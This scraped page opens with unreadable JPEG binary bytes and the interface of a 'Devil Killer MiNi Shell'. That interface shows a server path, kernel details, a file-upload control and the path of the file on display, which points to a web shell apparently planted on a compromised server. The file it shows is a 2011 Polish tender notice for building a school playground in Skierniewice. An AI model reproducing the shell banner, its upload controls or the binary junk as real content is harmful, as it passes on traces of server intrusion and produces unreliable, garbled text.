JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111010/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111010/266319-N-2011.html

<p class="kh_header"><b>Skierniewice: Opracowanie dokumentacji projektowej wraz z wykonaniem placu zabaw dla programu RADOSNA SZKOŁA - Place Zabaw zadanie pn. Utworzenie szkolnego placu zabaw przy Szkole Podstawowej Nr 7        w  Skierniewicach.</b><br>
<b>Numer ogłoszenia: 266319 - 2011; data zamieszczenia: 10.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Skierniewice , ul. Rynek 1, 96-100 Skierniewice, woj. łódzkie, tel. 046 8345100, faks 046 8345151.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um.skierniewice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej wraz z wykonaniem placu zabaw dla programu RADOSNA SZKOŁA - Place Zabaw zadanie pn. Utworzenie szkolnego placu zabaw przy Szkole Podstawowej Nr 7        w  Skierniewicach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia:  

1.	Przedmiotem zamówienia  jest: opracowanie dokumentacji projektowej i wykonanie placu zabaw dla programu RADOSNA SZKOŁA - Place Zabaw zadanie pn. Utworzenie szkolnego placu zabaw przy Szkole Podstawowej Nr 7                      w Skierniewicach. Dokumentacja winna spełniać wymogi zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 31 sierpnia 2010 r. w sprawie rodzajów innych form wychowania przedszkolnego, warunków tworzenia i organizowania tych form oraz sposobu ich działania.
2.	Charakterystyka : zorganizowanie przewiduje zorganizowanie placu zabaw na terenie  
             o kształcie prostokąta o wymiarach 20x25 m i wydzieleniu:
           - strefy do zabaw i ćwiczeń ruchowych o nawierzchni bezpiecznej piankowej,  
              gumowej o pow. 240 m2
           - strefy komunikacyjnej ścieżka o nawierzchni typu tartan lub inna syntetyczna o  
             pow. 50 m2
          - strefy zielonej pod trawniki o pow. 210 m2.
		
3.         Przedmiot zamówienia obejmuje wykonanie następujących prac: 
1. Przygotowanie materiałów do zgłoszenia rozpoczęcia robót budowlanych nie 
wymagających pozwolenia na budowę w tym : 
opracowanie przez uprawnionego projektanta projektu rozmieszczenia urządzeń 
zabawowych, nawierzchni bezpiecznej, ścieżek i roślinności oraz przedstawienie go do 
akceptacji Zamawiającemu. Do projektu muszą być dołączone rysunki lub zdjęcia 
poszczególnych elementów wyposażenia wraz z podanymi wymiarami. W kosztach należy ująć koszt uzyskania map do celów projektowych . Opracowanie projektowe musi zawierać oświadczenie dyrektora jednostki o uzgodnieniu  z nim dokumentacji projektowej placu zabaw i wykonania.
3. Budowę, dostawę i montaż urządzeń na placu zabaw. 
4. Wykonanie bezpiecznej nawierzchni w strefie bezpieczeństwa urządzenia zabawowego 
oraz nawierzchni ścieżek oraz zieleni . 
5. Sporządzenie regulaminu placu zabaw i jego montaż na konstrukcjach dostarczonych przez 
Wykonawcę.
W ramach obowiązków leżących po stronie Wykonawcy w celu prawidłowego wykonania 
robót dotyczących zarówno etapu projektowania jak również wykonania robót budowlanych  jest wykonanie wszystkich innych niezbędnych prac potrzebnych do oddania do użytku przedmiotu zamówienia. W cenę zamówienia powinny być wliczone wszelkie koszty ponoszone przez Wykonawcę niezbędne do wykonania przedmiotu zamówienia  w tym koszty wszystkich uzgodnień i odbioru robót. 

Urządzenia zabawowe wskazane przez Zamawiającego:  

1. Zestaw zabawowy z dwoma zjeżdżalniami :
   Wieża z dachem dwuspadowym , 2 platformy kwadratowe, 1 pomost tunelowy , 2    
    zjeżdżalnie  w tym zjeżdżalnia głęboka , 4 zabezpieczenia z aplikacją , 1 podest , 2  
    wejściówki , stopnie, rurka nad zjeżdżalnią  
2. Huśtawka  2 osobowa na 2 sprężynach typu ważka -szt.1. 
3.  Sprężynowce -szt. 2.- typu żaba , skuter 
4.Sprężynowce szt. 4 - typu : konik, kogut, delfin , słoń
5. Huśtawka  podwójna metalowa  z koszykami z zapięciem  szt. 1.
6. Sklepik 
Bezpieczna wysokość upadku dla wszystkich urządzeń  powinna wynosić nie mniej niż  1,50m. 
Zaproponowane przez Wykonawcę  urządzenia muszą  wskazywać opisane powyżej funkcje, a gabarytowo muszą zostać dostosowane do przedziału wiekowego 6-11 lat. 
Bezpieczna strefa użytkowania dla każdego elementu zostanie określona przez Wykonawcę 
w opracowanym projekcie  wg wymaganych norm i przepisów . 
Oprócz elementów wskazanych powyżej, na terenie przeznaczonym na plac zabaw należy 
umieścić dodatkowo : 
Urządzenia uzupełniające 
1. ławka z oparciem o wymiarach min. dł.1,5 x szer.0,4 x wys.1,0 m. - 2 szt. 
2. kosz na śmieci metalowy(z wyciąganym wkładem) - 2 szt. 
3. tablica informacyjna z regulaminem - szt. 1 (Wykonanie i zainstalowanie na terenie 
szkolnego placu zabaw tablicy zawierającej regulamin określający zasady i warunki 
korzystania z placu zabaw oraz napis o treści: Szkolny plac zabaw wyposażony w ramach 
programu rządowego RADOSNA SZKOŁA 
4. tabliczki informujące o sposobie wykorzystania danego elementu wyposażenia 
i przestrzeganiu zasad bezpiecznego użytkowania - dotyczy urządzeń zabawowych. 
Zamawiający wymaga, aby elementy wyposażenia placu zabaw, zaprojektowane zostały 
w konwencji naturalnej z materiałów drewnianych (okrąglaki, bale), lin stalowych, lub 
łańcuchów i drążków metalowych, zakonserwowanych i zaimpregnowanych odpowiednimi 
farbami i preparatami do konserwacji drewna zapewniającymi ochronę urządzeń 
zabezpieczonego przed negatywnym wpływem warunków atmosferycznych przez okres, co 
najmniej 3 lat). Elementy ze stali o wysokiej odporności na rozciąganie zabezpieczone 
powłoką galwaniczną i polakierowane metoda proszkowa. Wszystkie elementy 
wykończeniowe zastosowane do wykonania wyposażenia placu zabaw winny być 
wykonane z materiałów lekkich, odpornych i zachowujących kolorystykę w trudnych warunkach atmosferycznych. 
Urządzenia dla zapewnienia stabilności powinny być kotwione w gruncie poprzez betonowanie. W przypadku kontaktu z ziemią należy stosować: 
1. stosowanie gatunku drewna o dostatecznej odporności naturalnej zgodnie z klasami 1 i 2 
klasyfikacji naturalnej odporności normy EN 350-2:1994,gdy drewno znajduje się 
ponad ziemią na metalowej stopie, 
2. stosowanie drewna poddanego impregnacji ciśnieniowej zgodnie z normą 
EN 351-1:1995 i zgodnie z 4 klasą zagrożenia EN 335-2. 
Podstawowymi, dominującymi kolorami powinny być 
- pomarańcz i niebieski. 
Proponowane do wyposażenia placu elementy gotowe jak również robione na zamówienie powinny posiadać stosowne certyfikaty zgodności z warunkami bezpieczeństwa określonymi 
w szczególności w przepisach w sprawie bezpieczeństwa i higieny w publicznych 
i niepublicznych szkołach i placówkach. 
Wszelkie urządzenia zastosowane na placu zabaw dla dzieci powinny być 
wykonane zgodnie z wymogami normy PN-EN 1176 (wyposażenie placów zabaw i wymagania bezpieczeństwa). 
Nawierzchnie wyposażenia placów zabaw powinny być przepuszczalne bez konieczności stosowania odwodnień skanalizowanych, realizowane winny być zgodnie z wymogami normy PN-EN 1177 (nawierzchnie placów zabaw amortyzujące upadki), piankowa - kolor pomarańczowy - paleta barw PANTONE 152 C; RAL; 2011 Tieforange - ułożona z kształtek, tworzących nieregularne układy powierzchni jako bezpieczna nawierzchnia, określona w odniesieniu do dużego placu zabaw w ilości  240,0 m2 , typu tartan lub inna syntetyczna 
- wylewana, zgodna z wymogami normy- kolor niebieski - paleta barw PANTONE; 540 C; 
RAL, 5003 Saphirblau - ułożona w postaci wijącej się łagodnymi łukami ścieżki, jako nawierzchnia ścieżek - ok. 50,0 m2 .  Nawierzchnię należy układać na podbudowie z kruszywa naturalnego, stabilizowanego mechanicznie. Poszczególne warstwy podbudowy : warstwa podłoża piasku 10 cm , warstwa tłucznia po uwałowaniu min 10 cm ,  miał kamienny 3 cm . Powierzchnie bezpieczne należy zamknąć obrzeżem bet. poniżej nawierzchni  . W celu ułatwienia spływu wód opadowych należy zastosować na nawierzchni spadek  ~1,0 %. 
Szerokość ścieżek wynosi ~1,5 m. Należy ukształtować je w układach luźno wijących się, o kształtach obłych.  Nawierzchnię ww ciągów należy ograniczyć obrzeżem betonowym na styku z nawierzchnią trawiasta.  W celu ułatwienia spływu wód opadowych należy zastosować spadek poprzeczny 2,0 %.
Ilość zieleni określona w ilości ok. 210,0 m2. 
Wszystkie urządzenia mają być zakotwione w gruncie zgodnie z normami w celu 
bezpiecznego użytkowania urządzeń. 
Norma PN-EN 1176-1 określa jednoznacznie sposób fundamentowania urządzeń 
Zabawowych .
Szczegółowe wytyczne dotyczące placów zabaw zostały określone w Koncepcji idei 
zagospodarowania szkolnych placów zabaw i szkolnych miejsc zabaw dla dzieci młodszych
określonych przez Ministerstwo Edukacji Narodowej 
Minimalny okres, na który Wykonawca udzieli gwarancji to trzy lata od daty odbioru 
końcowego. 
W wartości oferty musi zostać uwzględniona cena  wykonania nawierzchni trawiastej na pozostałej części placu zabaw na której nie zostanie ułożona nawierzchnia bezpieczna. Pokrycie powierzchni szkolnego placu zabaw zielenią (trawa odporna na trudne warunki użytkowania). Wykonawca musi na bieżąco utrzymywać porządek na terenie prowadzenia robót, na bieżąco usuwać niezbędne materiały i odpadki. Wykonawca jako posiadacz odpadów winien stosować się do zapisów ustawy Prawo Ochrony Środowiska i ustawy o odpadach. Po zakończeniu robót, teren powinien zostać doprowadzony do należytego stanu. 
 Prace na obiekcie będące przedmiotem zamówienia winny być wykonane zgodnie 
z opracowaną przez Wykonawcę dokumentacją projektowa, warunkami zawartymi w siwz 
oraz wzorem umowy. Na czas prowadzenia robót Wykonawca musi zabezpieczyć 
teren prac i zapewnić niezbędny dozór oraz kierownictwo robót. Wykonawca będzie prowadził roboty zgodnie z przepisami ustawy Prawo budowlane, Polskimi Normami, sztuką 
budowlaną oraz przepisami BHP. 
Wykonawca zabezpieczy i oznakuje teren budowy zgodnie z obowiązującymi w tym zakresie 
instrukcjami, koszty oznakowania zostaną włączone w cenę oferty. 
Wszystkie materiały zastosowane do realizacji zamówienia muszą 
spełniać warunki określone w art. 10 ustawy z dnia 7 lipca 1994r. Prawo budowlane (tj. Dz. U. z 2006r. Nr 156, poz.1118 ze zm.) 
Wykonawca przedłoży Zamawiającemu na zamontowane urządzenia zabawowe deklaracje 
producenta o zgodności z normami wyposażenia placu zabaw, certyfikaty bezpieczeństwa, 
deklaracje odpowiedzialności za wyroby, instrukcje kontroli obsługi i konserwacji, rysunki 
oraz oświadczenia o zgodności zamontowania urządzeń z instrukcją montażu oraz                   o nadawaniu się do użytkowania zgodnie z przeznaczeniem. 

Wstępny projekt na wykonanie placu zabaw zostanie złożony do Zamawiającego celem akceptacji w terminie 7 dni od podpisania umowy.

4. Nazwy własne producentów, materiałów i urządzeń podane w dokumentach będących 
dokumentacją przetargową podane są przykładowo. Dopuszcza się zastosowanie urządzeń 
równoważnych spełniających wskazane funkcje o parametrach i funkcjonalności nie gorszej 
niż wskazane urządzenia przez Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.22.10.00-3, 45.11.27.23-9, 45.21.42.00-2, 37.53.52.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 06.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium
- Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium w wysokości  
   3.000 zł. trzy tysiące złotych
- Wadium powinno być wniesione przed upływem  terminu składania ofert
- Wadium może być wniesione w formach przewidzianych w art. 45 ust. 6 Ustawy 
- Wadium w pieniądzu należy wpłacić na rachunek bankowy o nr konta: KREDYT BANK S.A. Oddział w Skierniewicach nr 42 1500 1689 1216 8004 0851 0000 z dopiskiem  - wadium do przetargu pn.: Utworzenie szkolnego placu zabaw przy Szkole Podstawowej Nr 7 w Skierniewicach
- Zamawiający będzie przechowywał wadium wniesione w pieniądzu na rachunku bankowym  
   i jego zwrot nastąpi zgodnie z art. 46, ust. 4 Ustawy.
- Wadium w innych dopuszczonych formach należy wnieść w kasie Urzędu Miasta 
   Skierniewice.
- Zwrot wadium nastąpi w przypadkach i na warunkach przewidzianych w art. 46 Ustawy.
- Zamawiający zatrzyma wadium wraz z odsetkami w przypadkach przewidzianych w art. 46,  
   ust. 4A i 5 Ustawy - Pzp
Wadium należy wnieść na okres związania ofertą.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 pkt 1-4 ustawy Pzp oraz dostarczą dokumenty wymagane w SIWZ oraz wykonawcy, którzy nie podlegają wykluczeniu na podstawie art. 24 ust. 1 ustawy oraz dostarczą dokumenty wymagane w SIWZ. Na dowód tego Wykonawca winien złożyć oświadczenia wg. zał. nr 2 i nr 4. Sposób dokonywania oceny spełnienia warunków udziału w postępowaniu będzie przeprowadzony w oparciu o przedłożone przez wykonawców dokumenty i oświadczenia, metodą warunku granicznego spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek określony w art.22 ust.1 pkt 2 ustawy Pzp, dotyczący posiadania odpowiedniej wiedzy i doświadczenia Zamawiający uzna za spełniony jeżeli Wykonawca wykaże że wykonał w ciągu ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie dwie roboty budowlane wraz z  usługami projektowymi podobne z rodzaju do przedmiotu zamówienia, każda o wartości minimum 100 000 zł netto. Wykonawca winien złożyć 	wykaz robót budowlanych wraz z opracowaniem dokumentacji projektowej w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia, wykonywanych w okresie ostatnich pięciu lat przed upływem  terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone (wg wzoru nr 3 do SIWZ). Sposób dokonywania oceny spełnienia warunku udziału w postępowaniu będzie przeprowadzony w oparciu o przedłożone przez wykonawców dokumenty i oświadczenia, metodą warunku granicznego spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że powyższy warunek zostanie spełniony przez Wykonawcę, który dysponuje odpowiednim potencjałem technicznym. Na dowód tego Wykonawca winien złożyć oświadczenie wg. zał. nr 2. Sposób dokonywania oceny spełnienia warunku udziału w postępowaniu będzie przeprowadzony w oparciu o przedłożone przez wykonawców dokumenty i oświadczenia, metodą warunku granicznego spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek określony w art.22 ust.1 pkt 3 ustawy Pzp, dotyczący dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający uzna za spełniony, na dowód tego Wykonawca winien złożyć oświadczenie wg. zał. nr 2. Sposób dokonywania oceny spełnienia warunku udziału w postępowaniu będzie przeprowadzony w oparciu o przedłożone przez wykonawców dokumenty i oświadczenia, metodą warunku granicznego spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek określony w art. 22 ust.1 pkt 4 ustawy Pzp, dotyczący sytuacji ekonomicznej i finansowej Zamawiający uzna za spełniony, gdy Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę minimalną 100.000,- zł. Sposób dokonywania oceny spełnienia warunku udziału w postępowaniu będzie przeprowadzony w oparciu o przedłożone przez wykonawców dokumenty i oświadczenia, metodą warunku granicznego spełnia-nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony formularz oferty wg wzoru - zał. nr 1 do SIWZ. 2. Oświadczenie wykonawcy o spełnieniu warunków wymaganych art. 22 ust.1 Ustawy - Prawo zamówień publicznych - wg wzoru stanowiącego załącznik nr 2 do SIWZ. 3. Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie - wg wzoru stanowiącego załącznik nr 3 do SIWZ. 4. Oświadczenie o braku podstaw do wykluczenia - według wzoru stanowiącego załącznik nr 4 do SIWZ, 5. Wskazać części zamówienia, których wykonanie wykonawca zamierza powierzyć podwykonawcom, wg wzoru stanowiącego załącznik nr 5 do SIWZ. 6. Jeżeli wykonawcę reprezentuje pełnomocnik, do oferty musi być załączone pełnomocnictwo.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

